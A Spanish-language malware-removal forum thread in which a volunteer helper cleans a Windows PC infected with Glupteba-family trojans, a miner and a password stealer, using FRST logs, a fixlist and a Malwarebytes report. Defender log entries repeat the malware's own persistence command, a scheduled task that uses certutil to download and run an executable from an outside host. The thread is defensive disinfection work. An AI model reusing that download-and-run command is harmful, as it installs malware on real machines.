FirewallRules: [{789DE70E-024F-4050-AA65-E5F2641A3C0F}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{FD994FE8-240C-4D91-84D9-861E7B020845}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4F5F7C96-D74C-40C5-BF96-81A2C184EAC1}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{13A74BEE-51BA-4014-AF89-9D851F23A7F7}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{28C56E29-49B8-422A-B5C7-3B3B00284C7E}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{1999DB93-B198-4CFC-8584-BF3585CE9297}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4172C886-1E79-470F-9880-86DAA7FE774F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{9497431F-322E-41E0-A6B4-295D3267B5AD}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{0FC84AB7-10D6-4ED7-8E9F-E02CC8870431}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{B09072F1-FDBC-4195-A132-5BBBC0365818}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{F3BF9589-9A4D-47C3-848C-6422F8650EC0}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.67.99.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{036784ED-6175-4B10-AB54-35F7CC19C3E3}] => (Allow) C:\WINDOWS\rss\csrss.exe () [Archivo no firmado]
==================== Puntos de Restauración =========================
==================== Dispositivos defectuosos en el Administrador de dispositivos ============
==================== Errores del registro de eventos: ========================
Errores de aplicación:
==================
Error: (01/02/2021 07:10:18 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al llamar a la rutina CoCreateInstance. HR = 0x8007045b, Se está cerrando el sistema.
.
Error: (01/02/2021 07:10:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: Información del Servicio de instantáneas de volumen: el servidor COM con CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} y el nombre CEventSystem no puede iniciarse. [0x8007045b, Se está cerrando el sistema.
]
Error: (01/02/2021 07:10:18 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al llamar a la rutina CoCreateInstance. HR = 0x8007045b, Se está cerrando el sistema.
.
Error: (01/02/2021 07:10:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: Información del Servicio de instantáneas de volumen: el servidor COM con CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} y el nombre CEventSystem no puede iniciarse. [0x8007045b, Se está cerrando el sistema.
]
Error: (01/02/2021 06:19:26 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: GameBar.exe, versión: 5.420.11102.0, marca de tiempo: 0x5faaa7cb
Nombre del módulo con errores: KERNELBASE.dll, versión: 10.0.19041.662, marca de tiempo: 0xec58f015
Código de excepción: 0xc0000409
Desplazamiento de errores: 0x000000000010bd5c
Identificador del proceso con errores: 0xc1c
Hora de inicio de la aplicación con errores: 0x01d6e125b446dbaf
Ruta de acceso de la aplicación con errores: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe\GameBar.exe
Ruta de acceso del módulo con errores: C:\WINDOWS\System32\KERNELBASE.dll
Identificador del informe: ed49456d-c4ad-41f0-9a49-ddce43781be4
Nombre completo del paquete con errores: Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe
Identificador de aplicación relativa del paquete con errores: App
Error: (01/02/2021 04:06:05 PM) (Source: VSS) (EventID: 13) (User: )
Description: Información del Servicio de instantáneas de volumen: el servidor COM con CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} y el nombre CEventSystem no puede iniciarse. [0x8007045b, Se está cerrando el sistema.
]
Error: (01/02/2021 04:06:05 PM) (Source: VSS) (EventID: 13) (User: )
Description: Información del Servicio de instantáneas de volumen: el servidor COM con CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} y el nombre CEventSystem no puede iniciarse. [0x8007045b, Se está cerrando el sistema.
]
Error: (01/02/2021 04:05:55 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al llamar a la rutina QueryFullProcessImageNameW. HR = 0x80070006, Controlador no válido.
.
Operación:
Ejecutando operación asincrónica
Contexto:
Estado actual: DoSnapshotSet
Errores del sistema:
=============
Error: (01/03/2021 04:47:23 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: El servicio xTendSoftAPService se terminó de manera inesperada. Esto ha sucedido 1 veces.
Error: (01/03/2021 04:47:07 PM) (Source: TPM) (EventID: 15) (User: NT AUTHORITY)
Description: El controlador de dispositivo para el Módulo de plataforma segura (TPM) encontró en el hardware de TPM un error irrecuperable que impide que se usen los servicios de TPM (como el cifrado de datos). Para obtener más ayuda, póngase en contacto con el fabricante del equipo.
Error: (01/03/2021 04:45:50 PM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: El servicio Killer Analytics Service no se cerró correctamente después de recibir un control de aviso de apagado.
Error: (01/03/2021 03:57:54 PM) (Source: TPM) (EventID: 15) (User: NT AUTHORITY)
Description: El controlador de dispositivo para el Módulo de plataforma segura (TPM) encontró en el hardware de TPM un error irrecuperable que impide que se usen los servicios de TPM (como el cifrado de datos). Para obtener más ayuda, póngase en contacto con el fabricante del equipo.
Error: (01/03/2021 03:57:36 PM) (Source: volmgr) (EventID: 161) (User: )
Description: No se pudo crear el archivo de volcado debido a un error durante la creación del volcado.
Error: (01/03/2021 03:58:08 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: El cierre anterior del sistema a las 12:22:05 del 03/01/2021 resultó inesperado.
Error: (01/03/2021 09:29:46 AM) (Source: TPM) (EventID: 15) (User: )
Description: El controlador de dispositivo para el Módulo de plataforma segura (TPM) encontró en el hardware de TPM un error irrecuperable que impide que se usen los servicios de TPM (como el cifrado de datos). Para obtener más ayuda, póngase en contacto con el fabricante del equipo.
Error: (01/03/2021 12:07:06 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-DDRBOLI)
Description: El servidor {FD06603A-2BDF-4BB1-B7DF-5DC68F353601} no se registró con DCOM dentro del tiempo de espera requerido.
Windows Defender:
===================================
Date: 2021-01-03 16:48:43.0400000Z
Description:
Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nombre: Trojan:Win32/Ceprolad.A
Id.: 2147726914
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Origen de detección: Desconocido
Tipo de detección: Concreto
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.329.1587.0, AS: 1.329.1587.0, NIS: 1.329.1587.0
Versión de motor: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-03 16:01:14.0320000Z
Description:
Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nombre: Trojan:Win32/Ceprolad.A
Id.: 2147726914
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Origen de detección: Desconocido
Tipo de detección: Concreto
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.329.1542.0, AS: 1.329.1542.0, NIS: 1.329.1542.0
Versión de motor: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-03 09:40:33.8340000Z
Description:
Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nombre: Trojan:Win32/Ceprolad.A
Id.: 2147726914
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Origen de detección: Desconocido
Tipo de detección: Concreto
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.329.1542.0, AS: 1.329.1542.0, NIS: 1.329.1542.0
Versión de motor: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-02 21:39:41.3020000Z
Description:
Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nombre: Trojan:Win32/Ceprolad.A
Id.: 2147726914
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Origen de detección: Desconocido
Tipo de detección: Concreto
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.329.1542.0, AS: 1.329.1542.0, NIS: 1.329.1542.0
Versión de motor: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-02 21:01:42.3220000Z
Description:
Antivirus de Microsoft Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nombre: Trojan:Win32/Ceprolad.A
Id.: 2147726914
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\javier\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Origen de detección: Desconocido
Tipo de detección: Concreto
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.329.1542.0, AS: 1.329.1542.0, NIS: 1.329.1542.0
Versión de motor: AM: 1.1.17700.4, NIS: 1.1.17700.4
==================== Información de la memoria ===========================
BIOS: American Megatrends Inc. E16J9IMS.310 02/23/2017
Placa base: Micro-Star International Co., Ltd. MS-16J9
Procesador: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
Porcentaje de memoria en uso: 27%
RAM física total: 16298.93 MB
RAM física disponible: 11800.46 MB
Virtual total: 32682.93 MB
Virtual disponible: 26682.51 MB
==================== Unidades ================================
Drive c: () (Fixed) (Total:920.91 GB) (Free:671.42 GB) NTFS
Drive e: () (Fixed) (Total:237.98 GB) (Free:226.12 GB) NTFS
Drive f: () (Fixed) (Total:10 GB) (Free:8.98 GB) NTFS
\\?\Volume{a5d69057-0000-0000-0000-100000000000}\ (Reservado para el sistema) (Fixed) (Total:0.49 GB) (Free:0.17 GB) NTFS
\\?\Volume{0cb5cc8e-0000-0000-0000-503ae6000000}\ () (Fixed) (Total:0.6 GB) (Free:0.08 GB) NTFS
==================== MBR & Tabla de particiones ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: A5D69057)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=238 GB) - (Type=07 NTFS)
==========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 0CB5CC8E)
Partition 1: (Active) - (Size=920.9 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=617 MB) - (Type=27)
Partition 3: (Not Active) - (Size=10 GB) - (Type=07 NTFS)
==================== Final de Addition.txt =======================Hola @javier_getafe
1.- Realiza una copia de seguridad del registro : Para hacerlo descarga [Delfix 1] (DelFix | InfoSpyware) en tu escritorio.
Atención, ahora marca/selecciona únicamente las casillas Registry Backup, las demás NO
Pulsar en Run.
Se abrirá el informe (Delfix.txt), guárdalo por si fuera necesario y cierra la herramienta.
2.- En el equipo con los demas programas cerrados:
Inicio >>> Ejecutar >>>Escribes notepad.exe.
Ahora copia y pega estos archivos dentro del Notepad:
Start
CreateRestorePoint:
CloseProcesses:
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\m672.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\mg20201223-1.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\ml20201223.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\pcstats.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\ww30.exe
() [Archivo no firmado] C:\Windows\rss\csrss.exe
() [Archivo no firmado] C:\Windows\windefender.exe
ortcutAndArgument: Lr.worker.dll.lnk -> C:\Windows\system32\wscript.exe => /E:vbscript "C:\Users\javie\AppData\Roaming\Lr.worker.dll.vbs"
Task: {933B1409-05E0-46B9-BBCE-A92E74984723} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [4475904 2021-01-02] () [Archivo no firmado] <==== ATENCIÓN
R2 WinDefender; C:\WINDOWS\windefender.exe [1987072 2021-01-02] () [Archivo no firmado]
2021-01-02 21:39 - 2021-01-02 21:39 - 001987072 ____H C:\WINDOWS\windefender.exe
2021-01-02 15:21 - 2021-01-03 16:48 - 000003274 _____ C:\WINDOWS\system32\Tasks\csrss
2021-01-02 15:21 - 2021-01-02 15:21 - 000000000 ___HD C:\WINDOWS\rss
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Ningún archivo
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} =>
EMPTYTEMP:Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.<<
Nota: Es importante que la Hta Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no no trabajara.
Ejecutas Frst.exe.
Presionas el botón Fix y aguardas a que termine.
La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).
ATENCION!!! El siguiente Script de reparación fue hecho específicamente para este usuario, si tiene un problema similar por favor abra su propio tema para recibir ayuda personalizada. Usar Scripts de otros usuarios puede causar daños a su equipo
3.- Descarga, instala y ejecuta [Malwarebytes’ Anti-Malware 2]
(Malwarebytes 4.2 | InfoSpyware).
Presiona clic en “Use Malewarebytes Free” (Usar Malewarebyte gratis).
Pulsa en el botón “Open Malewarebytes Free”
Presiona el botón “Scan” (Escaneo)
Pulsa en “View report” (Ver informe).
Luego presionar el botón “Export” (Exportar). Elijes “Text file” (fichero de texto). Elijes un nombre y guardas ese archivo en el escritorio…
Pega reportes de Malwarebytes, fixlog y comentas como va el problema.
Un salu2.
Buenos días,
Parece que malware ha encontrado bastantes amenazas. He pulsado en el botón de cuarentena. Adjunto los dos informes solicitados en este mensaje. ¿Estaría ya limpio? Un saludo.
Resultados de la corrección de Farbar Recovery Scan Tool (x64) Versión: 14-12-2020
Ejecutado por javier (04-01-2021 07:41:45) Run:1
Ejecutado desde C:\Users\javie\Desktop
Perfiles cargados: javier
Modo de Inicio: Normal
==============================================
fixlist contenido:
*****************
Start
CreateRestorePoint:
CloseProcesses:
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\m672.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\mg20201223-1.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\ml20201223.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\pcstats.exe
() [Archivo no firmado] C:\Users\javier\AppData\Local\Temp\csrss\ww30.exe
() [Archivo no firmado] C:\Windows\rss\csrss.exe
() [Archivo no firmado] C:\Windows\windefender.exe
ortcutAndArgument: Lr.worker.dll.lnk -> C:\Windows\system32\wscript.exe => /E:vbscript "C:\Users\javie\AppData\Roaming\Lr.worker.dll.vbs"
Task: {933B1409-05E0-46B9-BBCE-A92E74984723} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [4475904 2021-01-02] () [Archivo no firmado] <==== ATENCIÓN
R2 WinDefender; C:\WINDOWS\windefender.exe [1987072 2021-01-02] () [Archivo no firmado]
2021-01-02 21:39 - 2021-01-02 21:39 - 001987072 ____H C:\WINDOWS\windefender.exe
2021-01-02 15:21 - 2021-01-03 16:48 - 000003274 _____ C:\WINDOWS\system32\Tasks\csrss
2021-01-02 15:21 - 2021-01-02 15:21 - 000000000 ___HD C:\WINDOWS\rss
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Ningún archivo
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} =>
EMPTYTEMP:
*****************
El punto de restauración fue creado correctamente.
Procesos cerrados correctamente.
C:\Users\javier\AppData\Local\Temp\csrss\m672.exe => No se encontró ningún proceso en ejecución
C:\Users\javier\AppData\Local\Temp\csrss\mg20201223-1.exe => No se encontró ningún proceso en ejecución
C:\Users\javier\AppData\Local\Temp\csrss\ml20201223.exe => No se encontró ningún proceso en ejecución
C:\Users\javier\AppData\Local\Temp\csrss\pcstats.exe => No se encontró ningún proceso en ejecución
C:\Users\javier\AppData\Local\Temp\csrss\ww30.exe => No se encontró ningún proceso en ejecución
C:\Windows\rss\csrss.exe => No se encontró ningún proceso en ejecución
C:\Windows\windefender.exe => No se encontró ningún proceso en ejecución
ortcutAndArgument: Lr.worker.dll.lnk -> C:\Windows\system32\wscript.exe => /E:vbscript "C:\Users\javie\AppData\Roaming\Lr.worker.dll.vbs" => Error: Ninguna corrección automática encontrada para esta entrada.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{933B1409-05E0-46B9-BBCE-A92E74984723}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{933B1409-05E0-46B9-BBCE-A92E74984723}" => eliminado correctamente
C:\WINDOWS\System32\Tasks\csrss => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => eliminado correctamente
HKLM\System\CurrentControlSet\Services\WinDefender => eliminado correctamente
WinDefender => servicio eliminado correctamente
C:\WINDOWS\windefender.exe => movido correctamente
"C:\WINDOWS\system32\Tasks\csrss" => no encontrado
C:\WINDOWS\rss => movido correctamente
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => eliminado correctamente
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxDTCM => eliminado correctamente
HKLM\Software\Classes\CLSID\{9B5F5829-A529-4B12-814A-E81BCB8D93FC} => eliminado correctamente
=========== EmptyTemp: ==========
BITS transfer queue => 10248192 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15809582 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 6946297 B
Edge => 28173 B
Chrome => 764638503 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 60620 B
javie => 14835370 B
RecycleBin => 8258224 B
EmptyTemp: => 782.8 MB datos temporales eliminados.
================================
El sistema necesita reiniciarse.
==== Final de Fixlog 07:45:21 ====
Malwarebytes
www.malwarebytes.com
-Detalles del registro-
Fecha del análisis: 4/1/21
Hora del análisis: 7:55
Archivo de registro: e4c9e2de-4e59-11eb-af22-4ccc6ade158d.json
-Información del software-
Versión: 4.3.0.98
Versión de los componentes: 1.0.1130
Versión del paquete de actualización: 1.0.35257
Licencia: Prueba
-Información del sistema-
SO: Windows 10 (Build 19041.685)
CPU: x64
Sistema de archivos: NTFS
Usuario: DESKTOP-DDRBOLI\javier
-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 282748
Amenazas detectadas: 13
Amenazas en cuarentena: 0
Tiempo transcurrido: 6 min, 48 seg
-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar
-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)
Módulo: 0
(No hay elementos maliciosos detectados)
Clave del registro: 1
Trojan.Glupteba.E, HKU\S-1-5-21-3503952492-1416054308-399170389-1001\SOFTWARE\MICROSOFT\180d7e26, Sin acciones por parte del usuario, 14813, 821174, 1.0.35257, , ame, , ,
Valor del registro: 2
Trojan.Glupteba.E, HKU\S-1-5-21-3503952492-1416054308-399170389-1001\SOFTWARE\MICROSOFT\180d7e26|CAMPAIGNID, Sin acciones por parte del usuario, 14813, 821174, 1.0.35257, , ame, , ,
Trojan.Glupteba.E, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\FIREWALLRULES|{036784ED-6175-4B10-AB54-35F7CC19C3E3}, Sin acciones por parte del usuario, 14813, 795081, 1.0.35257, , ame, , ,
Datos del registro: 0
(No hay elementos maliciosos detectados)
Secuencia de datos: 0
(No hay elementos maliciosos detectados)
Carpeta: 0
(No hay elementos maliciosos detectados)
Archivo: 10
Backdoor.Bot, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\WUP\WUP.EXE, Sin acciones por parte del usuario, 33, 874960, 1.0.35257, 0A2675B58C63F54C016E574F, dds, 01057296, CE4395EDBBF9869A5E276781AF2E0FB5, F059A5358C24CC362C2F74B362C75E02035FDF82F9FFAE8D553AFEE1A271AFD0
Trojan.BitCoinMiner.Generic, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\CSRSS\WUP\XARCH\WUP.EXE, Sin acciones por parte del usuario, 8675, 811154, 1.0.35257, F24CB72F397483E1616D5702, dds, 01057296, 8BC0535A7B801F05FD80D46525666576, B80914FAF6F1C7FD6CBF6F6832BEBF2B9DE726FF9AE10683787BA7EC436B38A2
Malware.AI.4290177215, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\CSRSS\PCSTATS.EXE, Sin acciones por parte del usuario, 1000000, 0, 1.0.35257, 8F22D4E41B267F87FFB6E8BF, dds, 01057296, 40C824A3863B901D73FBCF50B0ED974E, 28EB71956B76D4B4BF1966E66C43AB8DC9BC6FBAD817B8C0E0F2ECFB0DFA44DD
Malware.AI.3862499388, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\CSRSS\ML20201210.EXE, Sin acciones por parte del usuario, 1000000, 0, 1.0.35257, 0EA0B0470772DE6CE639103C, dds, 01057296, 098C59F8ED1BCEBA28856148DE776357, 15A0260856FFE8EC55FBD94C7D6F78964281CBDB515C7AA8A03730808B29C00B
Generic.Malware/Suspicious, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\CSRSS\M672.EXE, Sin acciones por parte del usuario, 0, 392686, 1.0.35257, , shuriken, , 1496F269A788B609062ADBD300F2D18C, 9D41D85B30958480BE3F7EEFF32D2CF4EBE2F1C5790DEDFD8CBAC0A3C8B58F03
Generic.Malware/Suspicious, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\CSRSS\COLLECTCHROMEFINGERPRINT.EXE, Sin acciones por parte del usuario, 0, 392686, 1.0.35257, , shuriken, , C07A4F2C1ED89B5044EAE1D832F49FC7, 5A3ED5641F881089FA932992BBB36343E2BEA21B97F7C20342E4524309BEA6D7
Trojan.Ranumbot, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\CSRSS\ML20201223.EXE, Sin acciones por parte del usuario, 15648, 892884, 1.0.35257, , ame, , D54ADE674CB0C3E6D322ED7380E8ADF6, 5191548B8EDF4B98E623F055F5205E2DB17AA220C28928B1DA1C3A9BA1A75EE0
Spyware.PasswordStealer.GO, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\CSRSS\U20200626.EXE, Sin acciones por parte del usuario, 15106, 835370, 1.0.35257, 3A6DCC44C81FA51E1B8DD1EF, dds, 01057296, C6E81BAC5A3385A0A9CEF0BF9B45C624, 3414DDDA2D8E2D44F7E33CF513DE0C6A10D593E0358AD55586657D42682FFB5C
Trojan.Agent, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\CSRSS\WW30.EXE, Sin acciones por parte del usuario, 7, 883432, 1.0.35257, , ame, , 90CAFC0D3130436FEAAF82698E847DA9, 01A21D6F8D7313FFE60E17A60C94035EFE0C11CB39BC41455C8674EF1083EF94
Trojan.Ranumbot, C:\USERS\JAVIER\APPDATA\LOCAL\TEMP\CSRSS\MG20201223-1.EXE, Sin acciones por parte del usuario, 15648, 892634, 1.0.35257, B03C8A7C07264D2B000444B4, dds, 01057296, 0A13D106FA3997A0C911EDD5AA0E147A, 5E46ECFFCFF9440E97BF4F0A85AD34132407F925B27A8759F5A01DE5EA4DA6AF
Sector físico: 0
(No hay elementos maliciosos detectados)
WMI: 0
(No hay elementos maliciosos detectados)
(end)
Hola.
Has debido eliminar todo lo que detectó malwarebytes, si no lo hiciste vuelve a ejecutar el programa.
Si puedes navegar sin inconvenientes nos avisas para dar el tema como solucionado.
Salu2.
Todo perfecto ya. Muchas gracias por la ayuda.
Hola.
Ejecuta Delfix y tilda la opcion “Remove disinfection tool”.
Un saludo.
listo. Todo limpio ahora. Muchas gracias.
Este tema se cerró automáticamente 2 días después de la última publicación. No se permiten nuevas respuestas.